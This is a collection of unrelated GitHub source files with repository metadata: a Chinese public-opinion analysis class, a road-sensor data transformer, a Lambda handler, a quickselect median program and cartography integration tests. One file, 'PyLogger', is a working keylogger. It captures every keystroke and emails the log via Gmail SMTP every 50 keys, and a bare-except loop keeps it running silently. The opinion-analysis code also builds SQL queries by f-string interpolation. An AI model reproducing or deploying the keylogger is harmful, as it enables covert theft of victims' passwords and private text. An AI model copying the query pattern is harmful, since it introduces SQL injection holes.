dic = {"shijianbaodao_bingtu": m}
return dic
def influence(self): # 事件影响 需要用到LDA
global zhu_ti
all_zt = ["房屋安置", "修建工程", "孩子学校", "工作工资", "居民户口", "交通", "物业维修", "城市发展", "医疗保险", "公司经营", "补贴政策"]
lda = models.LdaModel.load("./主题分类")
data = self.data
data1 = pd.read_pickle("content.pickle")
data2 = [data for data in data1["contents_clean"]]
dictionary = corpora.Dictionary(data2)
stopwords = pd.read_csv("tyc.csv")
stopwords = stopwords["word"].tolist()
w = []
for i in data["message"].tolist():
seg_word = [w for w in jieba.cut(i, cut_all=False) if len(w) > 1 and w not in stopwords]
bow = dictionary.doc2bow(seg_word) # 数据加入
a = lda.get_document_topics(bow)
b = [i[1] for i in a]
b.sort(reverse=True)
for z in a:
if b[0] == z[1]:
zhu_ti = z[0]
w.append(all_zt[zhu_ti])
w = pd.Series(w)
w = w.value_counts()
if len(w) > 10:
dic = {"shijianyingxiang_zhuxingtu": [{"xAxis": {"type": 'category', "data": w.index.tolist()[0:10]}},
{"series": [{"name": "影响主题", "data": w.values.tolist()[0:10],
"type": 'bar'}]}]}
else:
dic = {"shijianyingxiang_zhuxingtu": [{"xAxis": {"type": 'category', "data": w.index.tolist()}},
{"series": [{"name": "影响主题", "data": w.values.tolist(),
"type": 'bar'}]}]}
return dic
def attention(self): # 网民关注度分析
data = self.data
data = data.year_day.map(lambda x: x.split(" ")[0][0:7])
data = data.value_counts()
break_time = data.index.tolist()[0]
message1 = data[break_time]
conn = self.conn
sql = f'select * from bottom_car where year_day like "{break_time}%"'
sql2 = f'select * from shizhang where year_day like "{break_time}%"'
data1 = pd.read_sql(sql, conn)
data2 = pd.read_sql(sql2, conn)
data3 = pd.concat([data1, data2], axis=0)
a = int(message1) / len(data3) + 0.25
a = ("%.2f" % a)
tu_data = [{"value": a, "name": "程度分析"}] # 等级仪表盘 data的数据
dic = {"yibiaotu": {"data": tu_data}}
return dic
def reply(self): # 政府反馈信息报道
data = self.data
data['year_day'] = data['year_day'].apply(lambda x: x.replace(".", "-").split(" ")[0])
data['replyDate'] = data['replyDate'].apply(lambda x: x.replace(".", "-").split(" ")[0])
data["xiangcha"] = data["replyDate"].apply(pd.to_datetime) - data["year_day"].apply(pd.to_datetime) # 日期相减
data["xiangcha"] = data["xiangcha"].apply(lambda x: int(x.days))
data = data[data["xiangcha"] >= 0]
date = data["xiangcha"].sort_values(ascending=False)
mean_date = str(int(date.mean())) + "天"
long_date = str(date.values.tolist()[0]) + "天"
short_date = str(date.values.tolist()[-1]) + "天"
if short_date == "0天":
short_date = "当天"
dic1 = {"wengzixinxi": [{"chulishijian": [{"short_date": short_date}, {"long_date": long_date},
{"mean_date": mean_date}]}, {"manyidu": "100%"}]}
data1 = data.groupby("xiangcha").size()
data1.index = data1.index.map(lambda x: str(x) + "天") # 单独的一个series要用map
if len(data1) > 15:
dic2 = {"time_zhuxingtu": [{"yAxis": {"type": 'category', "data": data1.index.tolist()[0:15]}},
{"series": [{"name": "受理时间", "type": "bar",
"data": data1.values.tolist()[0:15]}]}]}
else:
dic2 = {"time_zhuxingtu": [{"yAxis": {"type": 'category', "data": data1.index.tolist()}},
{"series": [
{"name": "受理时间", "type": "bar", "data": data1.values.tolist()}]}]}
data = data.copy()
data["xiangcha"] = data["xiangcha"].apply(lambda x: str(x) + "天")
data = data.groupby("xiangcha").size().sort_values(ascending=False)
m = []
for i in range(len(data)):
if i < 13:
dic = {"value": str(data.values[i]), "name": data.index[i]}
m.append(dic)
dic3 = {"time_bingtu": m}
dic = {"zhengfufankui": [dic1, dic2, dic3]}
return dic
def cha_xun(keyword1):
shi_jiang = Picture(keyword1)
# print(shi_jiang.__dict__) # 查看初始化是否成功(数据库查询数据是否存在)
if shi_jiang.__dict__ == {} or shi_jiang.number < 5:
print("查询信息太少!")
return json.loads("templates/yiqing_error.json")
s = [shi_jiang.time_area, shi_jiang.bin_tu, shi_jiang.influence, shi_jiang.attention, shi_jiang.reply]
class MyThread(threading.Thread):
def __init__(self, func, args=()):
super(MyThread, self).__init__()
self.func = func
self.args = args
def run(self):
self.result = self.func(*self.args)
def get_result(self):
threading.Thread.join(self)
try:
return self.result
except Exception:
return None
c = []
for i in s:
a = MyThread(i)
a.start()
a.join()
b = a.get_result()
c.append(b)
c.append(keyword1)
dic = {"yuqingzhuizong": c}
if dic["yuqingzhuizong"][0] is None:
return json.loads("templates/yiqing_error.json")
else:
return dic
# cha_xun("公司") # 查询,传入关键字
| [
"3401506758@qq.com"
] | 3401506758@qq.com |
fb386bc0046e6b348676175c3c9cad5f9f92f63e | 662070fcb928aaee6404cce5d6b9f4560400f175 | /classification_algorithm/src/continuous_transformer.py | 8b26d4da2bb90063b6824c4ee7d58458a6f19987 | [
"Apache-2.0"
] | permissive | PMantovani/road-irregularity-detector | 134bcd45be625bc5cf4d564acdd1d695444f49c9 | 6df3bd517c403896f223b0e721eee25a610d9693 | refs/heads/master | 2021-08-17T11:55:13.309856 | 2018-10-31T01:35:42 | 2018-10-31T01:35:42 | 105,797,706 | 0 | 0 | Apache-2.0 | 2018-10-25T00:38:33 | 2017-10-04T17:33:02 | Python | UTF-8 | Python | false | false | 4,775 | py | import numpy as np
import math
'''Transforms individual readings into continuous ones'''
class ContinuousTransformer(object):
def __init__(self):
self.axis_independent = False
self.quality = 0
self.summary_array = []
self.max_means = [0] * 7
self.max_variances = [0] * 7
self.continuous_readings = []
self.start_time = 0
self.times_called = 0
def set_axis_independent(self, axis_independent):
self.axis_independent = axis_independent
def add_reading(self, individual_reading):
self.times_called += 1
if len(individual_reading) < 11:
self.__reset_continuous()
return
try:
road_status = int(individual_reading[0])
acc_x = float(individual_reading[1])
acc_y = float(individual_reading[2])
acc_z = float(individual_reading[3])
gyr_x = float(individual_reading[4])
gyr_y = float(individual_reading[5])
gyr_z = float(individual_reading[6])
lat = float(individual_reading[7])
lng = float(individual_reading[8])
speed = float(individual_reading[9])
curr_time = float(individual_reading[10])
except ValueError:
print self.times_called
if not self.continuous_readings:
self.quality = road_status
self.start_time = curr_time
if (road_status != self.quality or speed > 200 or speed < 15 or
lat > 90 or lat < -90 or lng > 180 or lng < -180):
self.__reset_continuous()
return
if self.axis_independent:
acc = math.sqrt(acc_x**2 + acc_y**2 + acc_z**2)
gyr = math.sqrt(gyr_x**2 + gyr_y**2 + gyr_z**2)
self.continuous_readings.append([road_status, acc, gyr, lat, lng, speed, curr_time])
else:
self.continuous_readings.append([road_status, acc_x, acc_y, acc_z, gyr_x,
gyr_y, gyr_z, lat, lng, speed, curr_time])
if curr_time - self.start_time >= 10:
self.__insert_to_summary_array()
return
def get_summary_array(self):
return self.summary_array
# result = []
# for row in self.summary_array:
# row[1] /= self.max_means[0]
# row[2] /= self.max_variances[0]
# row[3] /= self.max_means[1]
# row[4] /= self.max_variances[1]
# row[5] /= self.max_means[2]
# row[6] /= self.max_variances[2]
# row[7] /= self.max_means[3]
# row[8] /= self.max_variances[3]
# row[9] /= self.max_means[4]
# row[10] /= self.max_variances[4]
# row[11] /= self.max_means[5]
# row[12] /= self.max_variances[5]
# row[13] /= self.max_means[6]
# row[14] /= self.max_variances[6]
# result.append(row)
# return result
def __reset_continuous(self):
self.quality = 0
self.continuous_readings = []
def __insert_to_summary_array(self):
np_array = np.array(self.continuous_readings)
variance = np.var(np_array, axis=0)
mean = np.mean(np_array, axis=0)
# for i in xrange(len(self.max_means)):
# if i == 6:
# self.max_means[i] = max(self.max_means[i], abs(mean[9]))
# self.max_variances[i] = max(self.max_variances[i], abs(variance[9]))
# else:
# self.max_means[i] = max(self.max_means[i], abs(mean[i+1]))
# self.max_variances[i] = max(self.max_variances[i], abs(variance[i+1]))
if self.axis_independent:
self.summary_array.append(
[mean[0], mean[1], variance[1], mean[2], variance[2], mean[5], variance[5],
self.continuous_readings[0][3], self.continuous_readings[0][4],
self.continuous_readings[len(self.continuous_readings)-1][3],
self.continuous_readings[len(self.continuous_readings)-1][4],
self.continuous_readings[len(self.continuous_readings)-1][5]])
else:
self.summary_array.append(
[mean[0], mean[1], variance[1], mean[2], variance[2], mean[3], variance[3],
mean[4], variance[4], mean[5], variance[5], mean[6], variance[6], mean[9], variance[9],
self.continuous_readings[0][7], self.continuous_readings[0][8],
self.continuous_readings[len(self.continuous_readings)-1][7],
self.continuous_readings[len(self.continuous_readings)-1][8],
self.continuous_readings[len(self.continuous_readings)-1][10]])
self.__reset_continuous()
| [
"pmantovani94@gmail.com"
] | pmantovani94@gmail.com |
fdc19d0a4f81488f5c242f4dfcda161c70c25497 | a8d3471d8d2fa914a0f8bab0495b115e70538430 | /handler.py | 86e8d3670ac9432144feb56e01bd3d420ea7f28b | [] | no_license | davidbegin/morguebot | a03bbfa46cbfd6b916ace98a2f476e44d4843349 | f62d75917d13b4a443c0f3c8e00f7dd82720d9f3 | refs/heads/master | 2022-12-22T14:52:20.398139 | 2020-01-17T15:56:04 | 2020-01-17T15:56:04 | 213,519,437 | 8 | 0 | null | 2022-12-08T06:49:48 | 2019-10-08T01:16:15 | Python | UTF-8 | Python | false | false | 529 | py | import json
import os
from glm.generic_lambda_handler import lambda_handler as generic_lambda_handler
from flask_app import app
import xl_bot
import dungeon_gossiper
def async_handler(messages, context):
print(messages)
def lambda_handler(event, context):
result = generic_lambda_handler(
event=event, context=context, flask_app=app, async_handler=async_handler
)
print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
print(f"{result}")
print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
return result
| [
"davidmichaelbe@gmail.com"
] | davidmichaelbe@gmail.com |
d8f581f9755f052824c1e8e44b7e583598774331 | 60d6313b82d507533f297fb6dfbd0b765467f143 | /PyLogger- Python KeyLogger.pyw | e7cb564281ee27b7bf02dc103a98b3771dff5aad | [] | no_license | aravindmyd/PyLogger | c26937ef5c1977b9381b872db1e7fa1d47518328 | 973b6bdaa759352a9b66427202e426e542f2730e | refs/heads/master | 2020-04-17T17:06:42.221833 | 2019-01-21T08:42:13 | 2019-01-21T08:42:13 | 166,769,909 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,499 | pyw | from pynput.keyboard import Listener
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import datetime
while True:
try:
lst = []
def email_it():
user_name = "" #Your Email address [ Sender E-mail] example@gmail.com
password = "" #Sender E-mail password
to_add = "" #Receiver E-mail address receiver@gmail.com
subject = str(datetime.datetime.today()) + "Victim Keylogger Details " #Customize Your E-mail Subject
message = ''
for i in lst:
message = message + i
sss = MIMEMultipart()
sss['From'] = user_name
sss['To'] = to_add
sss['Subject'] = subject
sss.attach(MIMEText(message, 'plain'))
s = smtplib.SMTP('smtp.gmail.com', 587)
s.starttls()
s.login(user_name, password)
mgs = sss.as_string()
s.sendmail(user_name, to_add, mgs)
s.quit()
def write_to_list(key):
lst_key = str(key)
lst_key = lst_key.replace("'", "")
lst_key = key_code(lst_key)
lst.append(lst_key)
if len(lst) > 50: #It will send you the E-mail once the victim typed 50 keys. Change according to your Limit.
email_it()
lst.clear()
def key_code(letter): # Add as much key as possible. It makes your E-mail to look clean.
if letter == "Key.space":
return " "
if letter == "Key.shift":
return " [SHFT]"
if letter == "Key.ctrl_r":
return "[CTRL] "
if letter == "Key.enter":
return " [ENTER]"
if letter == "K ey.shift_r":
return "[SHFT]"
if letter == "Key.alt_l":
return "[ALT]"
if letter == "Key.backspace":
return "[BCKSP]"
if letter == "Key.ctrl_l":
return "[CTRL]"
if letter == "Key.ctrl_la":
return "[CTRL]"
if letter == "Key.tab":
return "[TAB]"
if letter == "Key.end":
return "[END]"
else:
return letter
with Listener(on_press=write_to_list) as lis:
lis.join()
except:
pass
| [
"noreply@github.com"
] | noreply@github.com |
5bc5841704b7e76662407f28703031472021dcc5 | c5b40793ae9ec944df54c2544dc4e2b4ecafa51d | /Data structure/Array/Program for Mean and median of an unsorted array using quickselect().py | 8be31a6cfee382a0f7bceeddd31a9ecfa697d0ce | [] | no_license | AjaykumarGP/MyDataStructures_SolvedProblems | ed77cad83450805fa977947dd7a34600cd397e8c | ade6f8e8404946e02be087a7c44277559312babf | refs/heads/main | 2023-05-04T21:16:42.068499 | 2021-05-29T13:53:10 | 2021-05-29T13:53:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,912 | py |
import random
#Program for Mean and median of an unsorted array using quickselect()
class MedianExtractor():
def __init__(self):
self.array = []
def shufflePivotIndex(self, low, high):
if low<high:
pivot = random.randrange(low, high)
self.array[pivot], self.array[high] = self.array[high], self.array[pivot]
return
def lomutoPartition(self, low, high):
self.shufflePivotIndex(low, high)
pivotIndex = high
trackingIndex = low
for i in range(low, high+1):
if self.array[trackingIndex] > self.array[pivotIndex]:
temp = self.array[trackingIndex]
self.array[trackingIndex] = self.array[pivotIndex-1]
self.array[pivotIndex-1] = self.array[pivotIndex]
self.array[pivotIndex] = temp
pivotIndex -=1
else:trackingIndex += 1
return pivotIndex
def quickselect(self, low, high, medianIndex):
if low<=high:
mid = self.lomutoPartition(low, high)
print(mid, medianIndex)
if mid == medianIndex:
return self.array[mid]
if mid > medianIndex:
return self.quickselect(low, mid-1, medianIndex)
elif mid < medianIndex:
return self.quickselect(mid+1, high, medianIndex)
def getMedian(self, array):
return (len(array) + 1) // 2
def copyArray(self, array):
self.array = array.copy()
array = [1, 3, 5, 2, 6, 6, 8, 7, 9, 10, 11, 13, 14, 15, 16]
heapObj = MedianExtractor()
medianIndex = heapObj.getMedian(array)
heapObj.copyArray(array)
print("median index", medianIndex)
median = heapObj.quickselect( 0, len(array)-1, medianIndex-1)
print("Median of the given array")
print(median)
| [
"noreply@github.com"
] | noreply@github.com |
b429309f8e623409f989dca83d4ff8711914cc70 | 1b1546cafc9453c4fdb9406533f94ed56206541c | /tests/tutorials/tour/test_decoupled.py | 1ca8a8aa8e194c9366c33e5da2f143cb4331d61d | [
"MIT"
] | permissive | pauleveritt/wired | bad7ecadae4f23874598031ae8d17e08ba34ec9b | 629f950176a9682a7ccb68efbb27cb2e23b4e93e | refs/heads/master | 2020-05-01T06:38:38.728436 | 2019-04-29T12:43:43 | 2019-04-29T12:43:43 | 177,335,238 | 1 | 1 | MIT | 2019-04-23T00:14:34 | 2019-03-23T20:08:57 | Python | UTF-8 | Python | false | false | 1,029 | py | import pytest
from wired import ServiceRegistry
@pytest.fixture
def settings():
from tutorials.tour.decoupled import Settings
settings = Settings(punctuation='!!')
return settings
@pytest.fixture
def registry(settings):
from tutorials.tour.decoupled import setup
r: ServiceRegistry = setup(settings)
return r
@pytest.fixture
def default_customer():
from tutorials.tour.decoupled import Customer
return Customer(name='Mary')
@pytest.fixture
def french_customer():
from tutorials.tour.decoupled.custom import FrenchCustomer
return FrenchCustomer(name='Henri')
def test_greet_customer(registry, default_customer):
from tutorials.tour.decoupled import greet_customer
actual = greet_customer(registry, default_customer)
assert 'Hello Mary !!' == actual
def test_greet_french_customer(registry, french_customer):
from tutorials.tour.decoupled import greet_customer
actual = greet_customer(registry, french_customer)
assert 'Bonjour Henri !!' == actual
| [
"pauleveritt@me.com"
] | pauleveritt@me.com |
1fd85db41dcf8eddff27a33ee5938c6672851025 | 0b8c187f15d4aa440b70a68bd1d6dab233042b06 | /setup.py | e1bbd20aacaa5072a127d0fe05e610444a1121fa | [] | no_license | ZithaChitra/seq2seq_lstms | 0d5af8ef043920da403fe9df6ceebf99037d4203 | 33b49e73475dc98703029465ea7358187e9ac5c7 | refs/heads/master | 2023-04-22T21:01:34.952387 | 2021-05-12T08:33:23 | 2021-05-12T08:33:23 | 362,598,982 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 578 | py | from setuptools import setup, find_packages
import pathlib
from os import path
__version__ = "0.1.0"
cwd = pathlib.Path.cwd()
# get dependencies and installs
with open(path.join(cwd, "requirements.txt"), encoding="utf-8") as f:
all_reqs = f.read().split("\n")
install_requires = [x.strip() for x in all_reqs if "git+" not in x]
dependency_links = [x.strp().replace("git+", "") for x in all_reqs if x.startswith("git+")]
setup(
name="ManyThings",
version=__version__,
packages=find_packages(),
install_requires=install_requires,
dependency_links=dependency_links,
) | [
""
] | |
2ee8380fc6a904aebb84b742cacca3669f9f7f0a | aea1d61c9a5d445f3a1c328a757dfa02d652f367 | /dataset_04__eph_stim_vs_dist/fig9b/code/data/results/all_lfps.py | 6880c9a242cd1df2c7015ad340675a073b8c6c85 | [] | no_license | ModelDBRepository/263988 | bb15ddf953a31ca44ac62ead919e3106389374f8 | b1f4bd4931bb1ddcc323108c39e389b9fa4234a0 | refs/heads/master | 2022-11-21T22:38:24.738870 | 2020-07-30T00:38:17 | 2020-07-30T00:38:17 | 283,632,019 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,650 | py | """
Miguel Capllonch Juan
30 September 2018
Draw together all the LFPs computed with the different methods:
- Results from the simulations (RN model)
- Using the VC conductor theory
"""
import numpy as np
import matplotlib.pyplot as plt
import csv
# Recording electrodes
rec_els = {
'E': {'pos': (250, 0, 19000),
'lfp_indiv_ly1': {}, 'lfp_indiv_ly2': {},
'lfp_total_ly1': None, 'lfp_total_ly2': None,
'color': 'r'},
'S': {'pos': (0, -250, 19000),
'lfp_indiv_ly1': {}, 'lfp_indiv_ly2': {},
'lfp_total_ly1': None, 'lfp_total_ly2': None,
'color': 'g'},
'W': {'pos': (-250, 0, 19000),
'lfp_indiv_ly1': {}, 'lfp_indiv_ly2': {},
'lfp_total_ly1': None, 'lfp_total_ly2': None,
'color': 'b'},
'N': {'pos': (0, 250, 19000),
'lfp_indiv_ly1': {}, 'lfp_indiv_ly2': {},
'lfp_total_ly1': None, 'lfp_total_ly2': None,
'color': 'k'}
}
# Stimulating electrode (amp in mA)
delay = 0.1
dur = 0.2
amp = -15.e-3
stimcurrent = None
stimelpos = (250, 0, 100)
# Medium conductivity tensor (1/(Ohm*um))
sigma_x = 1. / (1.211e3 * 1.e-6)
sigma_y = 1. / (1.211e3 * 1.e-6)
sigma_z = 1. / (0.175e3 * 1.e-6)
# Functions
def compute_lfp(currents, elpos):
""" Compute the LFP from a time series of currents as recorded by
a point electrode situated at elpos
The equation is taken from:
Nicholson & Freeman (1975)
The current sources are all the segments in the axon """
dx = x - elpos[0]
dy = y - elpos[1]
dz = z - elpos[2]
denominator = 4. * np.pi * np.sqrt\
(\
sigma_y * sigma_z * dx ** 2 + \
sigma_z * sigma_x * dy ** 2 + \
sigma_x * sigma_y * dz ** 2\
)
# denominator = np.tile(denominator, nt).reshape(currents.shape)
denominator = denominator.repeat(nt).reshape(currents.shape)
# print dz.shape, (dz ** 2).shape, currents.shape
return (currents / denominator).sum(axis=0)
def compute_lfp_fromtimeseries(currents, srcpos, elpos):
""" Compute the LFP from a time series of currents as recorded by
a point electrode situated at elpos
The equation is taken from:
Nicholson & Freeman (1975)
This time, there is only one current point source """
dx = srcpos[0] - elpos[0]
dy = srcpos[1] - elpos[1]
dz = srcpos[2] - elpos[2]
denominator = 4. * np.pi * np.sqrt\
(\
sigma_y * sigma_z * dx ** 2 + \
sigma_z * sigma_x * dy ** 2 + \
sigma_x * sigma_y * dz ** 2\
)
# denominator = np.tile(denominator, nt).reshape(currents.shape)
# denominator = denominator.repeat(nt).reshape(currents.shape)
# denominator = denominator.repeat(nt)
# print dz.shape, (dz ** 2).shape, currents.shape
return currents / denominator
# Declare arrays
names = {}
ily1 = {}
ily2 = {}
balancely1 = {}
balancely2 = {}
lfp_indiv_ly1 = {}
lfp_indiv_ly2 = {}
x = []
y = []
z = []
ii_fibs = []
# Other parameters
dt = 0.005
# Get recordings from file
recs = []
# with open('./recordings_R0P0_noartefacts.csv', 'r') as f:
with open('./recordings_R0P0_withartefacts.csv', 'r') as f:
frl = list(csv.reader(f))
for row in frl[1:]:
recs.append(float(row[1]))
recs = np.array(recs)
# Get currents from file
with open('./membranecurrents.csv', 'r') as f:
frl = list(csv.reader(f))
for i, row in enumerate(frl[1:]):
ifib = int(row[0])
ii_fibs.append(ifib)
name = row[1]
data = row[5:]
ndata = len(data) / 2
dataly1 = np.array([float(item) for item in data[:ndata]])
dataly2 = np.array([float(item) for item in data[ndata:]])
try:
ily1[ifib].append(dataly1.copy())
ily2[ifib].append(dataly2.copy())
names[ifib].append(name)
except KeyError:
names[ifib] = [name]
ily1[ifib] = [dataly1]
ily2[ifib] = [dataly2]
x.append(float(row[2]))
y.append(float(row[3]))
z.append(float(row[4]))
# Positions from lists to arrays
x = np.array(x)
y = np.array(y)
z = np.array(z)
# Finish setting parameters that depend on the data
tarray = np.arange(0, dt * ndata, dt)
nt = len(tarray)
nsegstotal = len(z)
stimcurrent = amp * np.ones_like(tarray)
# stimcurrent[np.where(tarray < delay + dur)] = amp
stimcurrent[np.where(tarray < delay)] = 0.
stimcurrent[np.where(tarray > delay + dur)] = 0.
# stimcurrent = stimcurrent()
# stimcurrent[np.where(delay < tarray < delay + dur)] = amp
# Positions of the nodes of Ranvier
zRN = {}
# and indices corresponding to them
indsRN = {}
for k, v in names.items():
zRN[k] = []
indsRN[k] = []
for i, vv in enumerate(v):
if 'node' in vv:
zRN[k].append(z[i])
indsRN[k].append(i)
for ifib in ii_fibs:
# Current balances
ily1[ifib] = np.array(ily1[ifib])
ily2[ifib] = np.array(ily2[ifib])
balancely1[ifib] = np.zeros(nt)
balancely2[ifib] = np.zeros(nt)
for i_t, t in enumerate(tarray):
balancely1[ifib][i_t] = ily1[ifib][:, i_t].sum()
balancely2[ifib][i_t] = ily2[ifib][:, i_t].sum()
# Individual LFPs
for k, re in rec_els.items():
re['lfp_indiv_ly1'][ifib] = compute_lfp(ily1[ifib], re['pos'])
re['lfp_indiv_ly2'][ifib] = compute_lfp(ily2[ifib], re['pos'])
# Finally, sum up the individual LFPs of the fibers into a total LFP
# for each electrode
for k, re in rec_els.items():
re['lfp_total_ly1'] = np.zeros(nt)
re['lfp_total_ly2'] = np.zeros(nt)
for ifib in ii_fibs:
re['lfp_total_ly1'] += re['lfp_indiv_ly1'][ifib]
re['lfp_total_ly2'] += re['lfp_indiv_ly2'][ifib]
# Add the contribution of the stimulating electrode
re['lfp_total_ly1'] += compute_lfp_fromtimeseries(stimcurrent,
stimelpos, re['pos'])
re['lfp_total_ly2'] += compute_lfp_fromtimeseries(stimcurrent,
stimelpos, re['pos'])
# What if I sum them?
resum = re['lfp_total_ly1'] + re['lfp_total_ly2']
# Now compare the two curves
resum_norm = resum / np.abs(resum.max() - resum.min())
recs_norm = recs / np.abs(recs.max() - recs.min())
###############################################################################
# Figures
# Time evolution at some point
fig, ax = plt.subplots()
ax.plot(tarray, recs, lw=3, label='RN model')
for k, re in rec_els.items():
ax.plot(tarray, re['lfp_total_ly1'], c=re['color'] , ls='-',
label=k + '. Layer 1')
ax.plot(tarray, re['lfp_total_ly2'], c=re['color'] , ls='--',
label=k + '. Layer 2')
ax.plot(tarray, resum, 'r', lw=3, label='Sum VC model')
ax.set_xlabel('Time (ms)')
ax.set_ylabel('Extracellular recordings (mV)')
ax.set_title('Extracellular recordings')
ax.legend()
fig.tight_layout()
# plt.show()
fig.savefig('recordings_all.png')
fig, ax = plt.subplots()
ax.plot(tarray, recs_norm, lw=3, label='RN model')
ax.plot(tarray, resum_norm, 'r', lw=3, label='Sum VC model')
ax.set_xlabel('Time (ms)')
ax.set_ylabel('Extracellular recordings (mV)')
ax.set_title('Extracellular recordings (normalised)')
ax.legend()
fig.tight_layout()
# plt.show()
fig.savefig('recordings_all_compare_RN_VC.png')
| [
"tom.morse@yale.edu"
] | tom.morse@yale.edu |
467a8932a4284ef0c6c865d87ef12e88ea571f4a | 3e63608e1cad90bc845c4580723e57ae7ca3f61d | /tests/integration/cartography/intel/github/test_repos.py | e15966d14e0a223c390827fa7a4e0532c091831d | [
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
] | permissive | lyft/cartography | 06dcbf13907cbb9a31b75cd8b21f5721f7cc1b01 | 830b8944879a01f52b21ee12b6fddf245f9733cb | refs/heads/master | 2023-08-31T12:27:59.752452 | 2023-08-28T20:42:12 | 2023-08-28T20:42:12 | 172,811,550 | 2,778 | 334 | Apache-2.0 | 2023-09-13T04:59:46 | 2019-02-27T00:16:29 | Python | UTF-8 | Python | false | false | 8,701 | py | import cartography.intel.github
import tests.data.github.repos
TEST_UPDATE_TAG = 123456789
TEST_JOB_PARAMS = {'UPDATE_TAG': TEST_UPDATE_TAG}
TEST_GITHUB_URL = "https://fake.github.net/graphql/"
def _ensure_local_neo4j_has_test_data(neo4j_session):
repo_data = cartography.intel.github.repos.transform(tests.data.github.repos.GET_REPOS)
cartography.intel.github.repos.load(
neo4j_session,
TEST_JOB_PARAMS,
repo_data,
)
def test_transform_and_load_repositories(neo4j_session):
"""
Test that we can correctly transform and load GitHubRepository nodes to Neo4j.
"""
repositories_res = tests.data.github.repos.GET_REPOS
repos_data = cartography.intel.github.repos.transform(repositories_res)
cartography.intel.github.repos.load_github_repos(
neo4j_session,
TEST_UPDATE_TAG,
repos_data['repos'],
)
nodes = neo4j_session.run(
"MATCH(repo:GitHubRepository) RETURN repo.id",
)
actual_nodes = {n['repo.id'] for n in nodes}
expected_nodes = {
"https://github.com/example_org/sample_repo",
"https://github.com/example_org/SampleRepo2",
"https://github.com/lyft/cartography",
}
assert actual_nodes == expected_nodes
def test_transform_and_load_repository_owners(neo4j_session):
"""
Ensure we can transform and load GitHub repository owner nodes.
"""
repositories_res = tests.data.github.repos.GET_REPOS
repos_data = cartography.intel.github.repos.transform(repositories_res)
cartography.intel.github.repos.load_github_owners(
neo4j_session,
TEST_UPDATE_TAG,
repos_data['repo_owners'],
)
nodes = neo4j_session.run(
"MATCH(owner:GitHubOrganization) RETURN owner.id",
)
actual_nodes = {n['owner.id'] for n in nodes}
expected_nodes = {
'https://github.com/example_org',
}
assert actual_nodes == expected_nodes
def test_transform_and_load_repository_languages(neo4j_session):
"""
Ensure we can transform and load GitHub repository languages nodes.
"""
repositories_res = tests.data.github.repos.GET_REPOS
repos_data = cartography.intel.github.repos.transform(repositories_res)
cartography.intel.github.repos.load_github_languages(
neo4j_session,
TEST_UPDATE_TAG,
repos_data['repo_languages'],
)
nodes = neo4j_session.run(
"MATCH(pl:ProgrammingLanguage) RETURN pl.id",
)
actual_nodes = {n['pl.id'] for n in nodes}
expected_nodes = {
'Python', 'Makefile',
}
assert actual_nodes == expected_nodes
def test_repository_to_owners(neo4j_session):
"""
Ensure that repositories are connected to owners.
"""
_ensure_local_neo4j_has_test_data(neo4j_session)
query = """
MATCH(owner:GitHubOrganization)<-[:OWNER]-(repo:GitHubRepository{id:$RepositoryId})
RETURN owner.username, repo.id, repo.name
"""
expected_repository_id = 'https://github.com/example_org/SampleRepo2'
nodes = neo4j_session.run(
query,
RepositoryId=expected_repository_id,
)
actual_nodes = {
(
n['owner.username'],
n['repo.id'],
n['repo.name'],
) for n in nodes
}
expected_nodes = {
(
'example_org',
'https://github.com/example_org/SampleRepo2',
'SampleRepo2',
),
}
assert actual_nodes == expected_nodes
def test_repository_to_branches(neo4j_session):
"""
Ensure that repositories are connected to branches.
"""
_ensure_local_neo4j_has_test_data(neo4j_session)
query = """
MATCH(branch:GitHubBranch)<-[:BRANCH]-(repo:GitHubRepository{id:$RepositoryId})
RETURN branch.name, repo.id, repo.name
"""
expected_repository_id = 'https://github.com/example_org/sample_repo'
nodes = neo4j_session.run(
query,
RepositoryId=expected_repository_id,
)
actual_nodes = {
(
n['branch.name'],
n['repo.id'],
n['repo.name'],
) for n in nodes
}
expected_nodes = {
(
'master',
'https://github.com/example_org/sample_repo',
'sample_repo',
),
}
assert actual_nodes == expected_nodes
def test_repository_to_languages(neo4j_session):
"""
Ensure that repositories are connected to languages.
"""
_ensure_local_neo4j_has_test_data(neo4j_session)
query = """
MATCH(lang:ProgrammingLanguage)<-[:LANGUAGE]-(repo:GitHubRepository{id:$RepositoryId})
RETURN lang.name, repo.id, repo.name
"""
expected_repository_id = 'https://github.com/example_org/SampleRepo2'
nodes = neo4j_session.run(
query,
RepositoryId=expected_repository_id,
)
actual_nodes = {
(
n['lang.name'],
n['repo.id'],
n['repo.name'],
) for n in nodes
}
expected_nodes = {
(
'Python',
'https://github.com/example_org/SampleRepo2',
'SampleRepo2',
),
}
assert actual_nodes == expected_nodes
def test_repository_to_collaborators(neo4j_session):
_ensure_local_neo4j_has_test_data(neo4j_session)
nodes = neo4j_session.run("""
MATCH (repo:GitHubRepository{name:"cartography"})<-[:OUTSIDE_COLLAB_WRITE]-(user:GitHubUser)
RETURN count(user.username) as collab_count
""")
actual_nodes = {n['collab_count'] for n in nodes}
expected_nodes = {5}
assert actual_nodes == expected_nodes
def test_pinned_python_library_to_repo(neo4j_session):
"""
Ensure that repositories are connected to pinned Python libraries stated as dependencies in requirements.txt.
Create the path (:RepoA)-[:REQUIRES{specifier:"0.1.0"}]->(:PythonLibrary{'Cartography'})<-[:REQUIRES]-(:RepoB),
and verify that exactly 1 repo is connected to the PythonLibrary with a specifier (RepoA).
"""
_ensure_local_neo4j_has_test_data(neo4j_session)
# Note: don't query for relationship attributes in code that needs to be fast.
query = """
MATCH (repo:GitHubRepository)-[r:REQUIRES]->(lib:PythonLibrary{id:'cartography|0.1.0'})
WHERE lib.version = "0.1.0"
RETURN count(repo) as repo_count
"""
nodes = neo4j_session.run(query)
actual_nodes = {n['repo_count'] for n in nodes}
expected_nodes = {1}
assert actual_nodes == expected_nodes
def test_upinned_python_library_to_repo(neo4j_session):
"""
Ensure that repositories are connected to un-pinned Python libraries stated as dependencies in requirements.txt.
That is, create the path
(:RepoA)-[r:REQUIRES{specifier:"0.1.0"}]->(:PythonLibrary{'Cartography'})<-[:REQUIRES]-(:RepoB),
